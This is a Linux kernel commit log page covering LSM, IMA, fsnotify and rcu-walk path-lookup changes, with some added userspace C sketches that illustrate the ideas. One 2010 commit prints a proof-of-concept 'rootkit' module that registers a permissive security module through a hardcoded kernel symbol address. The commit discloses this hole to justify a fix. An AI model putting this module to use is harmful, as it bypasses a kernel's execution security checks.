08 Jan, 2011

1 commit

  • …t/npiggin/linux-npiggin

    * 'vfs-scale-working' of git://git.kernel.org/pub/scm/linux/kernel/git/npiggin/linux-npiggin: (57 commits)
    fs: scale mntget/mntput
    fs: rename vfsmount counter helpers
    fs: implement faster dentry memcmp
    fs: prefetch inode data in dcache lookup
    fs: improve scalability of pseudo filesystems
    fs: dcache per-inode inode alias locking
    fs: dcache per-bucket dcache hash locking
    bit_spinlock: add required includes
    kernel: add bl_list
    xfs: provide simple rcu-walk ACL implementation
    btrfs: provide simple rcu-walk ACL implementation
    ext2,3,4: provide simple rcu-walk ACL implementation
    fs: provide simple rcu-walk generic_check_acl implementation
    fs: provide rcu-walk aware permission i_ops
    fs: rcu-walk aware d_revalidate method
    fs: cache optimise dentry and inode for rcu-walk
    fs: dcache reduce branches in lookup path
    fs: dcache remove d_mounted
    fs: fs_struct use seqlock
    fs: rcu-walk for path lookup
    ...

    Linus Torvalds
     

07 Jan, 2011

1 commit

  • Perform common cases of path lookups without any stores or locking in the
    ancestor dentry elements. This is called rcu-walk, as opposed to the current
    algorithm which is a refcount based walk, or ref-walk.

    This results in far fewer atomic operations on every path element,
    significantly improving path lookup performance. It also avoids cacheline
    bouncing on common dentries, significantly improving scalability.

    The overall design is like this:
    * LOOKUP_RCU is set in nd->flags, which distinguishes rcu-walk from ref-walk.
    * Take the RCU lock for the entire path walk, starting with the acquiring
    of the starting path (eg. root/cwd/fd-path). So now dentry refcounts are
    not required for dentry persistence.
    * synchronize_rcu is called when unregistering a filesystem, so we can
    access d_ops and i_ops during rcu-walk.
    * Similarly take the vfsmount lock for the entire path walk. So now mnt
    refcounts are not required for persistence. Also we are free to perform mount
    lookups, and to assume dentry mount points and mount roots are stable up and
    down the path.
    * Have a per-dentry seqlock to protect the dentry name, parent, and inode,
    so we can load this tuple atomically, and also check whether any of its
    members have changed.
    * Dentry lookups (based on parent, candidate string tuple) recheck the parent
    sequence after the child is found in case anything changed in the parent
    during the path walk.
    * inode is also RCU protected so we can load d_inode and use the inode for
    limited things.
    * i_mode, i_uid, i_gid can be tested for exec permissions during path walk.
    * i_op can be loaded.
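
    The per-dentry seqlock idea in the list above can be illustrated with a small
    userspace sketch using C11 atomics. It is not the kernel's implementation: the
    toy_* names and the struct layout are invented for illustration, the tuple is
    reduced to (name, inode number), and a single writer is assumed (the kernel
    serialises writers with a lock).

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical stand-in for a dentry; not the kernel's struct dentry. */
struct toy_dentry {
    atomic_uint seq;             /* even: stable, odd: update in progress */
    _Atomic(const char *) name;
    atomic_ulong ino;
};

/* A consistent copy of the tuple plus the sequence it was read under. */
struct toy_snapshot {
    unsigned seq;
    const char *name;
    unsigned long ino;
};

void toy_dentry_init(struct toy_dentry *d, const char *name, unsigned long ino)
{
    atomic_init(&d->seq, 0u);
    atomic_init(&d->name, name);
    atomic_init(&d->ino, ino);
}

/* Writer: bump to odd, change the fields, bump back to even. */
void toy_dentry_rename(struct toy_dentry *d, const char *name, unsigned long ino)
{
    unsigned s = atomic_load_explicit(&d->seq, memory_order_relaxed);

    assert((s & 1u) == 0);       /* single writer assumed */
    atomic_store_explicit(&d->seq, s + 1, memory_order_relaxed);
    atomic_thread_fence(memory_order_release);
    atomic_store_explicit(&d->name, name, memory_order_relaxed);
    atomic_store_explicit(&d->ino, ino, memory_order_relaxed);
    atomic_store_explicit(&d->seq, s + 2, memory_order_release);
}

/* True if nothing has been written since the snapshot was taken. */
bool toy_snapshot_valid(struct toy_dentry *d, const struct toy_snapshot *snap)
{
    atomic_thread_fence(memory_order_acquire);
    return atomic_load_explicit(&d->seq, memory_order_relaxed) == snap->seq;
}

/* Reader: no stores to the shared object; retry if a writer interfered. */
struct toy_snapshot toy_dentry_read(struct toy_dentry *d)
{
    struct toy_snapshot snap;

    do {
        /* Wait out an in-progress update (odd sequence). */
        while ((snap.seq = atomic_load_explicit(&d->seq,
                                                memory_order_acquire)) & 1u)
            ;
        snap.name = atomic_load_explicit(&d->name, memory_order_relaxed);
        snap.ino = atomic_load_explicit(&d->ino, memory_order_relaxed);
    } while (!toy_snapshot_valid(d, &snap));
    return snap;
}
```

    A reader keeps the returned sequence number and calls toy_snapshot_valid()
    again later, which corresponds to the "recheck the sequence" steps above.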

    When we reach the destination dentry, we lock it, recheck lookup sequence,
    and increment its refcount and mountpoint refcount. RCU and vfsmount locks
    are dropped. This is termed "dropping rcu-walk". If the dentry refcount does
    not match, we cannot drop rcu-walk gracefully at the current point in the
    lookup, so instead return -ECHILD (for want of a better errno). This signals the
    path walking code to re-do the entire lookup with a ref-walk.

    Aside from the final dentry, there are other situations that may be encountered
    where we cannot continue rcu-walk. In that case, we drop rcu-walk (ie. take
    a reference on the last good dentry) and continue with a ref-walk. Again, if
    we cannot drop rcu-walk gracefully, we return -ECHILD and do the whole lookup
    using ref-walk. But it is very important that we can continue with ref-walk
    for most cases, particularly to avoid the overhead of double lookups, and to
    gain the scalability advantages on common path elements (like cwd and root).
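
    The whole-lookup fallback described above (try rcu-walk, and redo everything
    with ref-walk on -ECHILD) can be sketched as follows. This is a userspace
    illustration under assumed names: walk_fn, lookup_with_fallback() and
    toy_walk() are hypothetical, and the in-place drop to ref-walk at the last
    good dentry is not modelled.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>

enum walk_mode { WALK_RCU, WALK_REF };

/* Hypothetical walker: returns 0 on success or a negative errno. */
typedef int (*walk_fn)(const char *path, enum walk_mode mode, void *ctx);

/* Try the lockless walk first; redo the entire lookup on -ECHILD. */
int lookup_with_fallback(const char *path, walk_fn walk, void *ctx)
{
    int err;

    assert(path != NULL);
    err = walk(path, WALK_RCU, ctx);
    if (err == -ECHILD)
        err = walk(path, WALK_REF, ctx);
    return err;
}

/* Counts attempts so the fallback can be observed. */
struct walk_stats {
    int rcu_attempts;
    int ref_attempts;
};

/* Toy walker: pretends any path containing "symlink" cannot be completed
 * in rcu-walk mode, standing in for the cases listed in the commit. */
int toy_walk(const char *path, enum walk_mode mode, void *ctx)
{
    struct walk_stats *st = ctx;

    if (mode == WALK_RCU) {
        st->rcu_attempts++;
        return strstr(path, "symlink") ? -ECHILD : 0;
    }
    st->ref_attempts++;
    return 0;
}
```

    With this toy walker, a path such as "/usr/bin/ls" completes in one rcu-walk
    attempt, while "/tmp/symlink/x" costs one failed rcu-walk plus one ref-walk,
    which is the double-lookup overhead the commit wants to keep rare.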

    The cases where rcu-walk cannot continue are:
    * NULL dentry (ie. any uncached path element)
    * parent with d_inode->i_op->permission or ACLs
    * dentries with d_revalidate
    * Following links

    In future patches, permission checks and d_revalidate become rcu-walk aware. It
    may be possible eventually to make following links rcu-walk aware.

    Uncached path elements will always require dropping to ref-walk mode, at the
    very least because i_mutex needs to be grabbed, and objects allocated.

    Signed-off-by: Nick Piggin

    Nick Piggin
     

06 Jan, 2011

1 commit

  • unix_release() can asynchronously set socket->sk to NULL, and
    it does so without holding the unix_state_lock() on "other"
    during stream connects.

    However, the reverse mapping, sk->sk_socket, is only transitioned
    to NULL under the unix_state_lock().

    Therefore make the security hooks follow the reverse mapping instead
    of the forward mapping.

    Reported-by: Jeremy Fitzhardinge
    Reported-by: Linus Torvalds
    Signed-off-by: David S. Miller

    David S. Miller
     

16 Nov, 2010

1 commit

  • The addition of CONFIG_SECURITY_DMESG_RESTRICT resulted in a build
    failure when CONFIG_PRINTK=n. This is because the capabilities code
    which used the new option was built even though the variable in question
    didn't exist.

    The patch here fixes this by moving the capabilities checks out of the
    LSM and into the caller. All (known) LSMs should have been calling the
    capabilities hook already so it actually makes the code organization
    better to eliminate the hook altogether.

    Signed-off-by: Eric Paris
    Acked-by: James Morris
    Signed-off-by: Linus Torvalds

    Eric Paris
     

27 Oct, 2010

2 commits

  • * ima-memory-use-fixes:
    IMA: fix the ToMToU logic
    IMA: explicit IMA i_flag to remove global lock on inode_delete
    IMA: drop refcnt from ima_iint_cache since it isn't needed
    IMA: only allocate iint when needed
    IMA: move read counter into struct inode
    IMA: use i_writecount rather than a private counter
    IMA: use inode->i_lock to protect read and write counters
    IMA: convert internal flags from long to char
    IMA: use unsigned int instead of long for counters
    IMA: drop the inode opencount since it isn't needed for operation
    IMA: use rbtree instead of radix tree for inode information cache

    Linus Torvalds
     
  • IMA always allocates an integrity structure to hold information about
    every inode, but only needed this structure to track the number of
    readers and writers currently accessing a given inode. Since that
    information was moved into struct inode instead of the integrity struct,
    this patch stops allocating the integrity structure until it is needed,
    greatly reducing memory usage.

    Signed-off-by: Eric Paris
    Acked-by: Mimi Zohar
    Signed-off-by: Linus Torvalds

    Eric Paris
     

21 Oct, 2010

3 commits

  • Right now secmark has lots of direct selinux calls. Use all LSM calls and
    remove all SELinux specific knowledge. The only SELinux specific knowledge
    we leave is the mode. The only point is to make sure that other LSMs at
    least test this generic code before they assume it works. (They may also
    have to make changes if they do not represent labels as strings)

    Signed-off-by: Eric Paris
    Acked-by: Paul Moore
    Acked-by: Patrick McHardy
    Signed-off-by: James Morris

    Eric Paris
     
  • No security module should change the sched_param parameter of
    security_task_setscheduler(). Doing so is not only meaningless, but also
    harmful if the caller passes a static variable.

    This patch removes the policy and sched_param parameters from
    security_task_setscheduler() because no security module uses
    them.

    Cc: James Morris
    Signed-off-by: KOSAKI Motohiro
    Signed-off-by: James Morris

    KOSAKI Motohiro
     
  • The default LSM module can be set to DAC (which means "enable no LSM module").
    If the default LSM module is set to DAC, security_module_enable() must return 0
    unless overridden via a boot-time parameter.

    Signed-off-by: Tetsuo Handa
    Acked-by: Serge E. Hallyn
    Signed-off-by: James Morris

    Tetsuo Handa
     

11 Aug, 2010

2 commits

  • * 'writable_limits' of git://decibel.fi.muni.cz/~xslaby/linux:
    unistd: add __NR_prlimit64 syscall numbers
    rlimits: implement prlimit64 syscall
    rlimits: switch more rlimit syscalls to do_prlimit
    rlimits: redo do_setrlimit to more generic do_prlimit
    rlimits: add rlimit64 structure
    rlimits: do security check under task_lock
    rlimits: allow setrlimit to non-current tasks
    rlimits: split sys_setrlimit
    rlimits: selinux, do rlimits changes under task_lock
    rlimits: make sure ->rlim_max never grows in sys_setrlimit
    rlimits: add task_struct to update_rlimit_cpu
    rlimits: security, add task_struct to setrlimit

    Fix up various system call number conflicts. We not only added fanotify
    system calls in the meantime, but asm-generic/unistd.h added a wait4
    along with a range of reserved per-architecture system calls.

    Linus Torvalds
     
  • * 'for-linus' of git://git.infradead.org/users/eparis/notify: (132 commits)
    fanotify: use both marks when possible
    fsnotify: pass both the vfsmount mark and inode mark
    fsnotify: walk the inode and vfsmount lists simultaneously
    fsnotify: rework ignored mark flushing
    fsnotify: remove global fsnotify groups lists
    fsnotify: remove group->mask
    fsnotify: remove the global masks
    fsnotify: cleanup should_send_event
    fanotify: use the mark in handler functions
    audit: use the mark in handler functions
    dnotify: use the mark in handler functions
    inotify: use the mark in handler functions
    fsnotify: send fsnotify_mark to groups in event handling functions
    fsnotify: Exchange list heads instead of moving elements
    fsnotify: srcu to protect read side of inode and vfsmount locks
    fsnotify: use an explicit flag to indicate fsnotify_destroy_mark has been called
    fsnotify: use _rcu functions for mark list traversal
    fsnotify: place marks on object in order of group memory address
    vfs/fsnotify: fsnotify_close can delay the final work in fput
    fsnotify: store struct file not struct path
    ...

    Fix up trivial delete/modify conflict in fs/notify/inotify/inotify.c.

    Linus Torvalds
     

02 Aug, 2010

1 commit

  • When commit be6d3e56a6b9b3a4ee44a0685e39e595073c6f0d "introduce new LSM hooks
    where vfsmount is available." was proposed, only the "struct file *" argument
    (which AppArmor wanted to use) was removed from security_path_truncate().
    But the length and time_attrs arguments are used by neither TOMOYO nor AppArmor.
    Thus, let's remove these arguments.

    Signed-off-by: Tetsuo Handa
    Acked-by: Nick Piggin
    Signed-off-by: James Morris

    Tetsuo Handa
     

28 Jul, 2010

1 commit

  • Introduce a new fsnotify hook, fsnotify_perm(), which is called from the
    security code. This hook is used to allow fsnotify groups to make access
    control decisions about events on the system. We also must change the
    generic fsnotify function to return an error code if we intend these hooks
    to be in any way useful.

    Signed-off-by: Eric Paris

    Eric Paris
     

16 Jul, 2010

1 commit


17 May, 2010

1 commit


12 Apr, 2010

13 commits


09 Mar, 2010

1 commit


03 Mar, 2010

1 commit

  • The LSM framework doesn't allow loading a security module at runtime; it must be loaded at boot time.
    But in security/security.c:
    int register_security(struct security_operations *ops)
    {
        ...
        if (security_ops != &default_security_ops)
            return -EAGAIN;
        ...
    }
    If security_ops == &default_security_ops, a security module can still be registered. If SELinux is enabled,
    other security modules can't register, but if SELinux is disabled at boot time, security_ops is set to
    default_security_ops, and LSM allows other kernel modules to use register_security() to register an untrusted
    security module. For example:

    Disable SELinux at boot time (selinux=0).

    #include
    #include
    #include
    #include
    #include
    #include
    #include

    MODULE_LICENSE("GPL");
    MODULE_AUTHOR("wzt");

    extern int register_security(struct security_operations *ops);
    int (*new_register_security)(struct security_operations *ops);

    int rootkit_bprm_check_security(struct linux_binprm *bprm)
    {
        return 0;
    }

    struct security_operations rootkit_ops = {
        .bprm_check_security = rootkit_bprm_check_security,
    };

    static int rootkit_init(void)
    {
        printk("Load LSM rootkit module.\n");

        /* cat /proc/kallsyms | grep register_security */
        new_register_security = 0xc0756689;
        if (new_register_security(&rootkit_ops)) {
            printk("Can't register rootkit module.\n");
            return 0;
        }
        printk("Register rootkit module ok.\n");

        return 0;
    }

    static void rootkit_exit(void)
    {
        printk("Unload LSM rootkit module.\n");
    }

    module_init(rootkit_init);
    module_exit(rootkit_exit);

    Signed-off-by: Zhitong Wang
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

01 Mar, 2010

1 commit


24 Feb, 2010

1 commit

  • Enhance the security framework to support resetting the active security
    module. This eliminates the need for direct use of the security_ops and
    default_security_ops variables outside of security.c, so make security_ops
    and default_security_ops static. Also remove the secondary_ops variable as
    a cleanup since there is no use for that. secondary_ops was originally used by
    SELinux to call the "secondary" security module (capability or dummy),
    but that was replaced by direct calls to capability and the only
    remaining use is to save and restore the original security ops pointer
    value if SELinux is disabled by early userspace based on /etc/selinux/config.
    Further, if we support this directly in the security framework, then we can
    just use &default_security_ops for this purpose since that is now available.

    Signed-off-by: Zhitong Wang
    Acked-by: Stephen Smalley
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

07 Feb, 2010

1 commit


04 Feb, 2010

1 commit

  • This allows the LSM to distinguish between syslog functions originating
    from /proc/kmsg access and direct syscalls. By default, the commoncaps
    will now no longer require CAP_SYS_ADMIN to read an opened /proc/kmsg
    file descriptor. For example the kernel syslog reader can now drop
    privileges after opening /proc/kmsg, instead of staying privileged with
    CAP_SYS_ADMIN. MAC systems that implement security_syslog have unchanged
    behavior.

    Signed-off-by: Kees Cook
    Acked-by: Serge Hallyn
    Acked-by: John Johansen
    Signed-off-by: James Morris

    Kees Cook
     

15 Jan, 2010

1 commit

  • Currently, the getsecurity and setsecurity operations return zero for
    kernel private inodes, where xattrs are not available directly to
    userspace.

    This confuses some applications, and does not conform to the
    man page for getxattr(2) etc., which state that these syscalls
    should return ENOTSUP if xattrs are not supported or disabled.

    Note that in the listsecurity case, we still need to return zero
    as we don't know which other xattr handlers may be active.

    For discussion of userland confusion, see:
    http://www.mail-archive.com/bug-coreutils@gnu.org/msg17988.html

    This patch corrects the error returns so that ENOTSUP is reported
    to userspace as required.
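
    From the userspace side, the distinction this fix restores might be handled
    roughly as below. This is a sketch, not code from the patch: the enum and the
    classify_getxattr() and probe_security_label() helpers are hypothetical, and
    "security.selinux" is used only as an example attribute name. getxattr(2),
    ENODATA and ENOTSUP are the real Linux interfaces.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/xattr.h>

enum xattr_probe {
    XATTR_PRESENT,      /* attribute exists */
    XATTR_ABSENT,       /* xattrs work, but this one is not set */
    XATTR_UNSUPPORTED,  /* xattrs not supported or disabled here */
    XATTR_ERROR         /* anything else (ENOENT, EACCES, ...) */
};

/* Map a getxattr() return value and errno to one of the cases above. */
enum xattr_probe classify_getxattr(ssize_t ret, int err)
{
    if (ret >= 0)
        return XATTR_PRESENT;
    if (err == ENODATA)
        return XATTR_ABSENT;
    if (err == ENOTSUP)
        return XATTR_UNSUPPORTED;
    return XATTR_ERROR;
}

/* Probe a path for a security label without reading the value. */
enum xattr_probe probe_security_label(const char *path)
{
    ssize_t ret;

    assert(path != NULL);
    /* A zero-sized buffer asks only for the length of the value. */
    ret = getxattr(path, "security.selinux", NULL, 0);
    return classify_getxattr(ret, errno);
}
```

    A zero return for a kernel-private inode would fall into the XATTR_PRESENT
    branch here, which is the kind of misreading the commit message describes.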

    Signed-off-by: James Morris
    Acked-by: Stephen Smalley
    Acked-by: Serge Hallyn

    James Morris
     

08 Dec, 2009

1 commit


10 Nov, 2009

1 commit

  • For SELinux to do better filtering in userspace we send the name of the
    module along with the AVC denial when a program is denied module_request.

    Example output:

    type=SYSCALL msg=audit(11/03/2009 10:59:43.510:9) : arch=x86_64 syscall=write success=yes exit=2 a0=3 a1=7fc28c0d56c0 a2=2 a3=7fffca0d7440 items=0 ppid=1727 pid=1729 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=rpc.nfsd exe=/usr/sbin/rpc.nfsd subj=system_u:system_r:nfsd_t:s0 key=(null)
    type=AVC msg=audit(11/03/2009 10:59:43.510:9) : avc: denied { module_request } for pid=1729 comm=rpc.nfsd kmod="net-pf-10" scontext=system_u:system_r:nfsd_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=system

    Signed-off-by: Eric Paris
    Signed-off-by: James Morris

    Eric Paris
     

09 Nov, 2009

1 commit

  • The LSM currently requires setting a kernel parameter at boot to select
    a specific LSM. This adds a config option that allows specifying a default
    LSM that is used unless overridden with the security= kernel parameter.
    If the config option is not set, the current behavior of the first LSM
    to register is used.
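
    The selection rule described above can be modelled in a few lines of
    userspace C. This is only a sketch of the stated behavior, not the kernel
    code: struct lsm_choice, lsm_choice_init() and lsm_module_enable() are
    hypothetical names, and an empty config_default stands for "config option
    not set".

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TOY_NAME_MAX 10   /* assumed name length limit for this sketch */

struct lsm_choice {
    char name[TOY_NAME_MAX + 1];   /* empty string: nothing chosen yet */
};

static void copy_name(char *dst, const char *src)
{
    /* snprintf truncates and always NUL-terminates. */
    snprintf(dst, TOY_NAME_MAX + 1, "%s", src);
}

/* The config default applies unless a security= boot parameter was given. */
void lsm_choice_init(struct lsm_choice *c, const char *config_default,
                     const char *boot_param)
{
    assert(config_default != NULL);
    copy_name(c->name, boot_param ? boot_param : config_default);
}

/* Called by each LSM at init: may this module become the active one? */
bool lsm_module_enable(struct lsm_choice *c, const char *name)
{
    if (c->name[0] == '\0') {
        copy_name(c->name, name);  /* old behavior: first to register wins */
        return true;
    }
    return strcmp(c->name, name) == 0;
}
```

    For example, with a config default of "apparmor" and no boot parameter only
    "apparmor" is enabled, while passing "selinux" as the boot parameter
    overrides that default.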

    Signed-off-by: John Johansen
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    John Johansen
     

25 Oct, 2009

1 commit


12 Oct, 2009

1 commit